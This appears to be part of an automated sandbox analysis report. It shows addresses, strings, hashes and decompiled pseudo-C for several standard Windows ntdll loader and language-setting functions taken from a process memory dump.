0x1e3b897d
0x00000000
0x1e3b8983
0x1e409c65
0x1e409c6d
0x1e409c72
0x1e409c75
0x1e409c75
0x1e409c82
0x1e409c86
0x1e409c87
0x1e409c88
0x1e409c89
0x1e409c8c
0x1e409c90
0x1e409c95
0x1e409c97
0x1e409ca0
0x1e409ca3
0x1e409ca9
0x1e409ca9
0x00000000
0x1e409ca9
0x1e409ca3
0x00000000
0x1e409c97
0x1e3b897d
0x00000000
0x1e3b8974
0x1e3b8988
0x1e3b8992
0x1e3b8996
0x00000000
0x1e3b8996
0x1e3b894c
0x00000000
0x1e3b8870
0x1e3b887b
0x1e3b887d
0x1e3b887f
0x1e3b8881
0x1e3b8884
0x1e3b8884
0x1e3b8886
0x1e3b8889
0x1e3b888c
0x1e3b888e
0x1e3b8891
0x1e3b8891
0x1e3b8898
0x00000000
0x00000000
0x1e3b889a
0x1e3b889b
0x1e3b889e
0x00000000
0x00000000
0x1e3b88a0
0x1e3b88a8
0x1e3b88b0
0x1e3b88b2
0x1e3b88d3
0x1e3b88d5
0x00000000
0x1e3b88d7
0x1e3b88db
0x1e3b88dc
0x1e3b88e0
0x1e3b88e8
0x1e3b88ee
0x1e3b88f0
0x1e3b88f3
0x1e3b88fc
0x1e3b8901
0x1e3b8906
0x1e3b890c
0x1e3b890c
0x1e3b890f
0x1e3b8916
0x1e3b8917
0x1e3b8918
0x1e3b8919
0x1e3b891a
0x1e3b891f
0x1e3b8921
0x1e409c52
0x1e409c55
0x1e409c5b
0x1e409cac
0x1e409cc0
0x1e409cc0
0x1e409c55
0x1e3b8927
0x1e3b8927
0x1e3b892f
0x1e3b8933
0x00000000
0x1e3b88f5
0x1e3b88f5
0x00000000
0x1e3b88f7
0x1e3b88f7
0x1e3b88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3b88fa
0x1e3b88f5
0x1e3b88f3
0x00000000
0x1e3b88d5
0x00000000
0x1e3b88b2
0x1e3b88c9
0x00000000
0x1e3b88c9
0x1e3b887f
0x1e3b886a
0x1e3b8857
0x1e3b8852
0x1e3b88bf
0x1e3b88bf
0x1e3b87aa
0x1e3b87ad
0x1e3b87ae
0x1e3b87b4
0x1e3b87b5
0x1e3b87b6
0x1e3b87b8
0x1e3b87bd
0x1e3b87c1
0x1e3b87f4
0x1e3b87fa
0x00000000
0x00000000
0x00000000
0x1e3b87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 1E409C18
minkernel\ntdll\ldrsnap.c, xrefs: 1E409C28
LdrpDoPostSnapWork, xrefs: 1E409C1E

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: c46a2c1ba63d862a74ae8298bcc840a320ea1b98ea00f47ffab094a0a96d7b67
Instruction ID: dc8583f27f56f564b0c8ecc451c0d4ecc4a7428bfaa90e30ee9c43a784f9d534
Opcode Fuzzy Hash: c46a2c1ba63d862a74ae8298bcc840a320ea1b98ea00f47ffab094a0a96d7b67
Instruction Fuzzy Hash: 8E91F135A00256DFDB08CF59C891ABAF3B6FF84314B15476AE916EBA40D731ED01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1E3B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E1E3BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E1E3AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1e495780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E1E425510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1e495780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E1E3C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1E3C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E1E427016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E1E3C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1E3C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E1E427016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E1E3DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E1E3AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x1e3b7e4c
0x1e3b7e50
0x1e3b7e55
0x1e3b7e58
0x1e3b7e5d
0x1e3b7e71
0x1e3b7f33
0x1e3b7e77
0x1e3b7e77
0x1e3b7e79
0x1e3b7e79
0x1e3b7e7e
0x1e3b7f45
0x1e409848
0x00000000
0x1e409848
0x1e3b7f4e
0x1e3b7f53
0x1e3b7f5a
0x00000000
0x00000000
0x1e40985a
0x1e409862
0x1e409866
0x00000000
0x1e40986c
0x00000000
0x1e40986c
0x1e3b7e84
0x1e3b7e84
0x1e3b7e8d
0x1e409871
0x1e3b7eb8
0x1e3b7ec0
0x1e3b7ec0
0x1e3b7e9a
0x1e40987e
0x00000000
0x00000000
0x1e409884
0x1e40988b
0x1e4098a7
0x1e4098ac
0x1e4098b1
0x1e4098b6
0x1e4098b8
0x1e4098b8
0x1e4098b9
0x00000000
0x1e4098b9
0x1e3b7ea0
0x1e3b7ea7
0x00000000
0x00000000
0x1e3b7eac
0x1e3b7eb1
0x1e3b7ec6
0x1e3b7ed0
0x1e4098cc
0x1e3b7ed6
0x1e3b7ed6
0x1e3b7ed6
0x1e3b7ede
0x1e3b7ee3
0x1e4098e3
0x1e4098f0
0x1e409902
0x1e4098f2
0x1e4098fb
0x1e4098fb
0x1e409907
0x1e40991d
0x1e40991d
0x1e409907
0x1e4098e3
0x1e3b7ef0
0x1e3b7f14
0x1e3b7f14
0x1e3b7f1e
0x1e409946
0x1e3b7f24
0x1e3b7f24
0x1e3b7f24
0x1e3b7f2c
0x1e40996a
0x1e409975
0x1e409975
0x1e40997e
0x1e409993
0x1e409993
0x1e40997e
0x00000000
0x1e3b7ef2
0x1e3b7efc
0x1e3b7f0a
0x1e3b7f0e
0x1e409933
0x00000000
0x1e409933
0x00000000
0x1e3b7f0e
0x00000000
0x00000000
0x00000000
0x1e3b7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 1E4098A2
Could not validate the crypto signature for DLL %wZ, xrefs: 1E409891
LdrpCompleteMapModule, xrefs: 1E409898

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 51d6925286a43f980fcbbe81cb68ae288e69e16bc575cdaf4c835a3dbd1035c6
Instruction ID: 2c7f7ebafb656ec8364615059c29647eb9b9f8b5470b9b09a9e5bc26e3c45948
Opcode Fuzzy Hash: 51d6925286a43f980fcbbe81cb68ae288e69e16bc575cdaf4c835a3dbd1035c6
Instruction Fuzzy Hash: 6D511235A007859BD712CB69C984B5A77E5FF84314F0807AAE952EBBE1D734ED00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1E3AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E1E3AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E1E3E95D0();
						}
						if(_t78 != 0) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E1E3EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E1E3EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E1E3E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E1E3EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L1E3AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E1E3EBB40(_t83, _t102 + 0x24, _t78);
								if(L1E3B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E1E3EBB40(_t84, _t102 + 0x24, _t94);
									if(L1E3B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x1e3ae620
0x1e3ae628
0x1e3ae62f
0x1e3ae631
0x1e3ae635
0x1e3ae637
0x1e3ae63e
0x1e405503
0x1e405503
0x1e3ae64c
0x1e3ae64c
0x1e3ae651
0x00000000
0x00000000
0x1e3ae661
0x1e3ae665
0x1e40542a
0x1e3ae715
0x1e3ae71a
0x1e3ae71c
0x1e3ae720
0x1e3ae720
0x1e3ae727
0x1e3ae736
0x1e3ae736
0x1e3ae743
0x1e3ae743
0x1e3ae673
0x1e3ae678
0x1e3ae67d
0x1e3ae682
0x1e3ae685
0x1e3ae692
0x1e3ae69b
0x1e3ae6a3
0x1e3ae6ad
0x1e3ae6b1
0x1e3ae6b2
0x1e3ae6bb
0x1e3ae6bf
0x1e3ae6c0
0x1e3ae6c8
0x1e3ae6cc
0x1e3ae6d5
0x1e3ae6d9
0x00000000
0x00000000
0x1e3ae6e5
0x1e3ae6ea
0x1e3ae6f9
0x1e3ae70b
0x1e3ae70f
0x1e405439
0x1e40545e
0x1e40545e
0x00000000
0x1e40545e
0x1e40543b
0x1e40543e
0x1e405440
0x1e405445
0x1e405472
0x1e405475
0x1e40548d
0x1e405493
0x1e4054a9
0x00000000
0x00000000
0x1e4054ab
0x1e4054b4
0x1e4054bc
0x1e4054c8
0x1e4054de
0x1e4054fb
0x1e4054e0
0x1e4054e6
0x1e4054eb
0x1e4054eb
0x1e4054de
0x00000000
0x1e4054bc
0x1e405477
0x1e40547a
0x1e405480
0x1e405483
0x1e405486
0x1e40548b
0x00000000
0x00000000
0x00000000
0x1e40548b
0x00000000
0x00000000
0x00000000
0x00000000
0x1e405447
0x1e405447
0x1e405447
0x1e405447
0x1e40544e
0x00000000
0x00000000
0x1e405450
0x1e405452
0x1e405455
0x1e40545a
0x00000000
0x00000000
0x00000000
0x1e40545c
0x1e40546a
0x1e40546d
0x1e40546f
0x00000000
0x1e40546f
0x1e3ae70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1E3AE68C
InstallLanguageFallback, xrefs: 1E3AE6DB
@, xrefs: 1E3AE6C0

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 0cff5a8cc5cf1909b63faf3197ff0871d4c9a9620c70012941c92fba6bb95506
Instruction ID: 61f6d2dfdf4f0eccc8ce29fe384a8cb2aa7eaf4bff5a1a2b851d04ca2a7edd29
Opcode Fuzzy Hash: 0cff5a8cc5cf1909b63faf3197ff0871d4c9a9620c70012941c92fba6bb95506
Instruction Fuzzy Hash: 1B518DB65083969BC714DF25C450BABB3E9EF88624F010A3EF985D7250F735D984C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1E43FF10, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E43FF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 1E43FF60

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: 04d31aaa1992f0525cedfcdf7558938a4bce83134ea890ac300b595ca2277834
Instruction ID: 1d035b6ff6c25db1578ff87b3db59a3a24b7c9f226c81dfd3634f0ed07a906cb
Opcode Fuzzy Hash: 04d31aaa1992f0525cedfcdf7558938a4bce83134ea890ac300b595ca2277834
Instruction Fuzzy Hash: 87110079920594EFDB02DF50CC48FD8BBB2FF0C715F608656E50A6B2A0C739A980DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DFAB0, Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E1E3DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E1E3BEEF0(0x1e497b60);
					_t134 =  *0x1e497b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1e497b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1e497b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E1E3B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E1E3B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E1E448938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E1E3AB150();
													}
													_t116 = E1E446D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E1E3B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1e498638; // 0x70da60
																	_t122 = L1E3B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E1E3B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E1E3B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L1E3DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L1E3B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E1E3DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E1E3DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E1E3DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E1E3DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E1E3DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1e497b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1e497b84 = _t75;
						_t73 = E1E3BEB70(_t134, 0x1e497b60);
						if( *0x1e497b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E1E3BFF60( *0x1e497b20);
							}
						}
						goto L5;
					}
				}
			}

0x1e3dfab0
0x1e3dfab2
0x1e3dfab3
0x1e3dfab4
0x1e3dfabc
0x1e3dfac0
0x1e3dfb14
0x1e3dfb17
0x1e3dfac2
0x1e3dfac8
0x1e3dfacd
0x1e3dfad3
0x1e3dfad3
0x1e3dfadd
0x1e3dfb18
0x1e3dfb1b
0x1e3dfb1d
0x1e3dfb1e
0x1e3dfb1f
0x1e3dfb20
0x1e3dfb21
0x1e3dfb22
0x1e3dfb23
0x1e3dfb24
0x1e3dfb25
0x1e3dfb26
0x1e3dfb27
0x1e3dfb28
0x1e3dfb29
0x1e3dfb2a
0x1e3dfb2b
0x1e3dfb2c
0x1e3dfb2d
0x1e3dfb2e
0x1e3dfb2f
0x1e3dfb3a
0x1e3dfb3b
0x1e3dfb3e
0x1e3dfb41
0x1e3dfb44
0x1e3dfb47
0x1e3dfb4a
0x1e3dfb4d
0x1e3dfb53
0x1e41bdcb
0x1e41bdcb
0x1e3dfb59
0x1e3dfb5b
0x1e3dfb5b
0x1e3dfb5e
0x1e41bdd5
0x1e41bdd8
0x00000000
0x1e41bdda
0x00000000
0x1e41bdda
0x1e3dfb64
0x1e3dfb64
0x1e3dfb64
0x1e3dfb67
0x1e3dfb6e
0x1e3dfb70
0x1e3dfb72
0x00000000
0x1e3dfb78
0x1e3dfb7a
0x1e3dfb7a
0x1e3dfb7d
0x1e3dfb80
0x1e41bddf
0x1e41bde1
0x00000000
0x1e41bde3
0x00000000
0x1e41bde3
0x1e3dfb86
0x1e3dfb86
0x1e3dfb86
0x1e3dfb8b
0x1e3dfb90
0x1e3dfb92
0x1e3dfb94
0x1e3dfb9a
0x1e3dfb9b
0x1e3dfba1
0x1e41bde8
0x1e41bdeb
0x1e41bded
0x1e41beb5
0x1e41beb5
0x1e41bebb
0x1e41bebd
0x1e41bec3
0x1e41bed2
0x1e41bedd
0x1e41bedd
0x1e41beed
0x00000000
0x1e41bdf3
